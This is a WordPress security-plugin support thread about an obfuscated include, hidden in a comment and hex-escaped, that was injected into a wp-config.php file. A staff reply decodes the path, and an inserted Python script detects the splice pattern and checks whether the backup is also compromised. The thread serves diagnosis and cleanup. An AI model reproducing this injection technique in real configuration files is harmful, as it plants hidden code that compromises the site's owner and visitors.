Prevent wp-config.php file edits


This topic contains 6 replies, has 2 voices, and was last updated by  Marsha Marrings 9 months, 1 week ago.

  • #33872

    Marsha Marrings
    Participant

    Found the following code in the wp-config file. Is there a BPS setting to prevent this? Any suggestion would be very much appreciated.

    /**
    * The base con*/include /*figurations of the WordPress.
    *
    * This*/"\x44:/w\x77w/W\x65bsi\x74es/\x68ead\x73afe\x74y.c\x61/we\x62roo\x74/wp\x2dcon\x74ent\x2fplu\x67ins\x32/wa\x73qui\x7a-ma\x73ter\x2dnex\x74/pa\x67e.p\x68p";/* file has the following configurations: MySQL settings, Table Prefix,
    * Secret Keys, WordPress Language, and ABSPATH. You can find more information
    * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
    * wp-config.php} Codex page. You can get the MySQL settings from your web host.
    *
    * This file is used by the wp-config.php creation script during the
    * installation. You don't have to use the web site, you can just copy this file
    * to "wp-config.php" and fill in the values.
    *
    * @package WordPress
    */
    #33873

    AITpro Admin
    Keymaster

    BPS Pro AutoRestore|Quarantine (ARQ IDPS) will automatically autorestore and/or quarantine any files that have been edited/tampered with.  If this code was injected into your wp-config.php file prior to installing BPS Pro then you would need to Turn Off ARQ, remove/delete this code from the wp-config.php file and run the Setup Wizards again.  If your website was hacked prior to installing BPS Pro then see this forum topic on how to clean up a hacked website/hosting account:  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

    Note: BPS Pro 13.3 has a new malware scanner that will detect this type of code injection.  Malware scanners are an “after the fact” type of tool to find malicious or obfuscated code.  The ARQ IDPS scanner (created years ago) is a real-time automated detect and repair feature that automatically prevents hacks from being successful in real-time by autorestoring and/or quarantining files, but ARQ IDPS only works correctly if your website/hosting account was “hack free” prior to installing BPS Pro on your website/hosting account.

    Hex obfuscated code decoded:
    D:/www/Websites/headsafety.ca/webroot/wp-content/plugins2/wasquiz-master-next/page.php

    #33874

    Marsha Marrings
    Participant

    Sorry, let me rephrase the question. How to block hacker/spammer from changing wp-config.php. Autorestore was on, yet file was modified and not quarantined. I’m trying to figure out how to configure BPS to prevent such an edit. Here is the part of the file that was edited:

    #33875

    AITpro Admin
    Keymaster

    Since ARQ did not autorestore and quarantine the wp-config.php file then one of these things below is the reason for that.

    1. The wp-config.php file was already edited prior to installing BPS Pro and the edited wp-config.php file was backed up in AutoRestore backup.  If this is what happened then the backup file will also have that wp-config.php file edit in it:  /wp-content/bps-backup/autorestore/root-files/wp-config.php.
    2. ARQ is not really turned On or the ARQ Cron override setting is on. Check your ARQ settings.
    3. Something is breaking ARQ on your website and ARQ is not actually working.  Test uploading or editing a file to see if ARQ is working or not.
    4. WordPress Crons are disabled on your website. AutoRestore and several other BPS Pro security features use standard WP crons to check things.  WP crons must be enabled on your website in order for most of BPS Pro’s security features to work correctly.

    Also this is a very common scenario that we see all the time unfortunately > someone installs BPS or BPS Pro and then starts seeing unusual or suspicious things in the log files or other things, which indicate that the site might already be hacked.  Most people believe that their website was just recently hacked, but unfortunately in 95% of the cases that we investigate the website was already hacked prior to installing BPS or BPS Pro for anywhere from a few months to a few years.

    #33880

    Marsha Marrings
    Participant

    Looking forward to 13.3, I have 13.2. The first thing I checked was if autorestore was on, and it was. It goes off after 4.8.1 upgrade, with notice, and I go through the steps on all the sites to get autorestore back on, but in this case, I hadn’t yet done the 4.8.1 and autorestore was still on. There was one file in quarantine, but it wasn’t this wp-config.php. This prompted me to study the file since every single file dropped or modified has been quarantined by BPS since day one of website and BPS. The file and the backup had the exact same file stamp and size. I am not qualified to comment on how the injection and the backup were the same size. It is the only way I can fathom how it didn’t get quarantined. Any other suggestions before 13.3 would be very much appreciated.

    #33881

    AITpro Admin
    Keymaster

    ARQ Automation automatically turns itself off, backs up files and turns itself back on.  There is a 1 minute time delay where ARQ Automation goes into a “Pending” status to ensure all files have actually completed being backed up.  If the ARQ “Pending” status is displayed for longer than 3 minutes then that means a problem was detected and an ARQ FailSafe has kicked in to prevent a serious problem and ARQ will not automatically be turned back on.  Do not bother comparing the last modified times of actual files to timestamps since that will not tell you anything useful.  Quarantine timestamps are only useful to tell you when a file was quarantined and that is the extent of the usefulness of Quarantine timestamps.  File size on the other hand is very useful since ARQ IDPS compares file sizes.  So what you have confirmed is that the wp-config.php file in ARQ file backups was already edited before you backed up files by running the Setup Wizard the first time.  That simply means the wp-config.php file was already edited prior to installing BPS Pro and running the Setup Wizards.

    My guess is that it was injected by a hacker script that once existed on your website, but you should always assume the worst and do a thorough check of your hosting account to make sure there are no leftover or existing hacker files or code anywhere under your hosting account.  WP Core folders and files do not need to be checked since you can just delete WP Core folders and files and replace them with new WP Core folders and files.  So that would leave you with checking any folders or files that are not WP Core files.  See this forum topic for general help info on dehacking a website/hosting account (typically any of the DB steps are not going to be necessary to do):  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/
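The two points made in this thread, that the hex-escaped string decodes to a plain include path and that a backup taken after the compromise will match the live file byte for byte, can be checked with a small script. The following is an added example written for this page, not BulletProof Security code and not how ARQ IDPS is implemented; it assumes a live wp-config.php and a backup copy on disk (the demo writes constructed copies of the injected header from the first post into a temporary directory that mirrors the /wp-content/bps-backup/autorestore/root-files/ layout mentioned above). It decodes the \xHH escapes, flags the comment-splice pattern (a docblock closed mid-sentence, an include, then the comment reopened), and compares size plus SHA-256 of live and backup so that "identical to backup" is not mistaken for "clean".

```python
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Optional

# Constructed sample input: the injected docblock quoted in the first post, with a
# stand-in DB_NAME line. Not a real file taken from the poster's site.
INJECTED_HEADER = r'''<?php
/**
* The base con*/include /*figurations of the WordPress.
*
* This*/"\x44:/w\x77w/W\x65bsi\x74es/\x68ead\x73afe\x74y.c\x61/we\x62roo\x74/wp\x2dcon\x74ent\x2fplu\x67ins\x32/wa\x73qui\x7a-ma\x73ter\x2dnex\x74/pa\x67e.p\x68p";/* file has the following configurations: MySQL settings, Table Prefix,
* @package WordPress
*/
define('DB_NAME', 'example_db');
'''

# Constructed clean counterpart of the same header for comparison.
CLEAN_HEADER = '''<?php
/**
* The base configurations of the WordPress.
* @package WordPress
*/
define('DB_NAME', 'example_db');
'''

HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
# A docblock closed mid-sentence, an include-style statement, then a comment
# reopened so the tail of the original sentence hides the statement's argument.
COMMENT_SPLICE = re.compile(
    r'\*/\s*(include_once|require_once|include|require|eval)\b[^;]*?/\*', re.IGNORECASE)


def decode_hex_escapes(s: str) -> str:
    """Expand the \\xHH escapes PHP evaluates inside a double-quoted string."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_injection(source: str) -> Optional[dict]:
    """Locate a comment-splice include and recover the file it loads, or None."""
    m = COMMENT_SPLICE.search(source)
    if m is None:
        return None
    rest = source[m.end():]
    close = rest.find('*/')  # end of the comment that swallows the sentence tail
    arg = re.match(r'\s*"([^"]*)"', rest[close + 2:]) if close >= 0 else None
    raw = arg.group(1) if arg else None
    return {
        "keyword": m.group(1).lower(),
        "raw": raw,
        "path": decode_hex_escapes(raw) if raw is not None else None,
    }


def fingerprint(path: Path) -> tuple:
    """Size and SHA-256 of a file; size is what the thread says ARQ compares,
    the hash additionally catches an edit that keeps the size unchanged."""
    data = path.read_bytes()
    return len(data), hashlib.sha256(data).hexdigest()


def audit(live: Path, backup: Path) -> dict:
    """Compare a live wp-config.php against its backup copy and explain the outcome."""
    live_size, live_hash = fingerprint(live)
    backup_size, backup_hash = fingerprint(backup)
    live_hit = find_injection(live.read_text(encoding="utf-8", errors="replace"))
    backup_hit = find_injection(backup.read_text(encoding="utf-8", errors="replace"))
    if live_hit and backup_hit:
        verdict = "backup already contains the injection: baseline was taken after the compromise"
    elif live_hit:
        verdict = "live file was modified after the backup: restore from backup"
    elif live_size == backup_size and live_hash == backup_hash:
        verdict = "clean and identical to backup"
    else:
        verdict = "no splice found, but files differ: inspect the diff"
    return {
        "same_size": live_size == backup_size,
        "same_hash": live_hash == backup_hash,
        "live_injection": live_hit,
        "backup_injection": backup_hit,
        "verdict": verdict,
    }


def demo() -> dict:
    """Reproduce the thread's situation: live file and backup both carry the injection.
    Paths are constructed inside a temporary directory, not the poster's site."""
    with tempfile.TemporaryDirectory() as tmp:
        live = Path(tmp) / "wp-config.php"
        backup = Path(tmp) / "wp-content" / "bps-backup" / "autorestore" / "root-files" / "wp-config.php"
        backup.parent.mkdir(parents=True)
        live.write_text(INJECTED_HEADER, encoding="utf-8")
        backup.write_text(INJECTED_HEADER, encoding="utf-8")
        return audit(live, backup)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running the script prints the decoded include path from the first post and the verdict that the backup copy carries the same injection, which is the conclusion reached above: a size or hash match between live file and backup only proves the two are the same, so the backup itself has to be inspected for the signature before it is trusted as a restore point.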

    #33882

    Marsha Marrings
    Participant

    Thank you for pointing me in all the right directions and for such an amazing product. The persistently quarantined file that was not the wp-config and the small number of backed up files indicated that I didn’t do the pre/setup process right (2 times). I did take Wordfence out and then reran and did the tests/checks you recommended. BPS is now working like on the other website and I’ve no doubt we’re back to bulletproof here too (once I delete everything and rebuild from April’s backup or scratch). Btw, Wordfence, iThemes and BPS work fine together on the other site, so I put them back and retested fine.  The peace of mind from having BPS and the tech support in the face of trouble, well I couldn’t do it without you, that’s for sure.
